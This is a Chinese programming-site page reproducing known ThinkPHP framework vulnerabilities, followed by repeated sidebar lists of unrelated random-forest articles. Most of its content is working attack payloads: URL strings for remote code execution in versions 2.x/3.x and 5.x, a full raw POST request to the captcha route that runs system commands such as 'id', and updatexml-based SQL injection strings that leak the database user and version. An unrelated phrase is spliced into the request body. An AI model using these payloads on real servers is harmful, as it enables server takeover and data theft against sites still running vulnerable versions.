ThinkPHP框架漏洞远程代码执行SQL注入信息泄露复现(附检测工具)--688IT编程网

ThinkPHP框架漏洞远程代码执⾏SQL注⼊信息泄露复现（附检测⼯具）

0x00 thinkphp简介

ThinkPHP是⼀个快速、兼容⽽且简单的轻量级国产PHP开发框架，ThinkPHP可以⽀持windows/Unix/Linux等服务器环境，正式版需要PHP5.0以上版本⽀持，⽀持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。

0x01 ThinkPHP 2.x 3.x 任意代码执⾏

ThinkPHP 2.x版本中，使⽤preg_replace的/e模式匹配路由，

导致⽤户的输⼊参数被插⼊双引号中执⾏，造成任意代码执⾏漏洞，ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

payload：/index.php?s=/index/index/name/$%7B@phpinfo()%7D

0x02 Thinkphp5 5.0.22/5.1.29 远程代码执⾏

漏洞位置：/index.php?s=captcha

payload：_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

0x03 ThinkPHP5 5.0.23远程代码执⾏

POC：post请求

POST /index.php?s=captcha HTTP/1.1

Host: 192.168.222.134:8080

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id中文版php开发工具

0X04 ThinkPHP5 SQL注⼊漏洞/信息泄露

信息泄露payload：/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

sql注⼊payload：/index.php?ids[0,updatexml(0,concat(0xa,@@version),0)]=1

发表评论

688IT编程网

ThinkPHP框架漏洞远程代码执行SQL注入信息泄露复现(附检测工具)

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林算法的改进方法

基于随机森林算法的风险预警模型研究

Python中的随机森林算法详解

随机森林发展历史

如何使用随机森林进行时间序列数据模式识别(八)

随机森林回归模型原理

如何使用随机森林进行时间序列数据模式识别(六)

如何使用随机森林进行时间序列数据预测(四)

如何使用随机森林进行异常检测(六)

随机森林算法和grandientboosting算法 -回复

随机森林方法总结全面

随机森林算法原理和步骤

随机森林的原理

随机森林重要性

随机森林算法

机器学习中随机森林的原理

随机森林算法原理

使用计算机视觉技术进行动物识别的技巧

基于crf命名实体识别实验总结

transformer预测模型训练方法

最新文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

随机森林结合直接正交信号校正的模型传递方法

标签列表

688IT编程网

ThinkPHP框架漏洞远程代码执行SQL注入信息泄露复现(附检测工具)

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林算法的改进方法

基于随机森林算法的风险预警模型研究

Python中的随机森林算法详解

随机森林发展历史

如何使用随机森林进行时间序列数据模式识别(八)

随机森林回归模型原理

如何使用随机森林进行时间序列数据模式识别(六)

如何使用随机森林进行时间序列数据预测(四)

如何使用随机森林进行异常检测(六)

随机森林算法和grandientboosting算法 -回复

随机森林方法总结全面

随机森林算法原理和步骤

随机森林的原理

随机森林 重要性

随机森林算法

机器学习中随机森林的原理

随机森林算法原理

使用计算机视觉技术进行动物识别的技巧

基于crf命名实体识别实验总结

transformer预测模型训练方法

最新文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

随机森林结合直接正交信号校正的模型传递方法

标签列表

随机森林重要性